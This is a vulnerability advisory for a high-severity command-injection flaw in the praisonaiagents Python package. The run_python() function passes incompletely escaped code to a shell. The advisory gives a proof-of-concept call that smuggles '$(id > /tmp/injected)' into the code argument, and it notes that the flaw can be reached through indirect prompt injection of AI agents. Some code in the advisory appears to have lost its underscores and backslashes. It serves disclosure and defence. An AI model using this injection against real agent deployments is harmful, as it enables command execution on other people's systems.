PT-2026-59585 · Pypi · Praisonaiagents
Published
2026-07-13
·
Updated
2026-07-13
CVSS v3.1
7.8
High
| Vector | AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
Summary
run python() in praisonai constructs a shell command string by interpolating user-controlled code into python3 -c "<code>" and passing it to subprocess.run(..., shell=True). The escaping logic only handles `` and ", leaving $() and backtick substitutions unescaped, allowing arbitrary OS command execution before Python is invoked.Details
execute command.py:290 (source) -> execute command.py:297 (hop) -> execute command.py:310 (sink)python
# source -- user-controlled code argument
def run python(code: str, cwd=None, timeout=60):
# hop -- incomplete escaping, $ and () not handled
escaped code = code.replace('', '').replace('"', '"')
command = f'{python cmd} -c "{escaped code}"'
# sink -- shell=True expands $() before python3 runs
return execute command(command=command, cwd=cwd, timeout=timeout)
# execute command calls subprocess.run(command, shell=True, ...)PoC
python
# tested on: praisonai==0.0.81 (source install, commit HEAD 2026-03-30)
# install: pip install -e src/praisonai
import sys
sys.path.insert(0, 'src/praisonai')
from praisonai.code.tools.execute command import run python
result = run python(code='$(id > /tmp/injected)')
print(result)
# verify
import subprocess
print(subprocess.run(['cat', '/tmp/injected'], capture output=True, text=True).stdout)
# expected output: uid=1000(narey) gid=1000(narey) groups=1000(narey)...Impact
Any agent pipeline or API consumer that passes user or task-supplied content to
run python() is exposed to full OS command execution as the process user. The function is reachable via indirect prompt injection and the auto-generated Flask server deploys with AUTH ENABLED = False by default when no token is configured.Fix
Found an issue in the description? Have something to add? Feel free to write us 👾
Related Identifiers
Affected Products
Praisonaiagents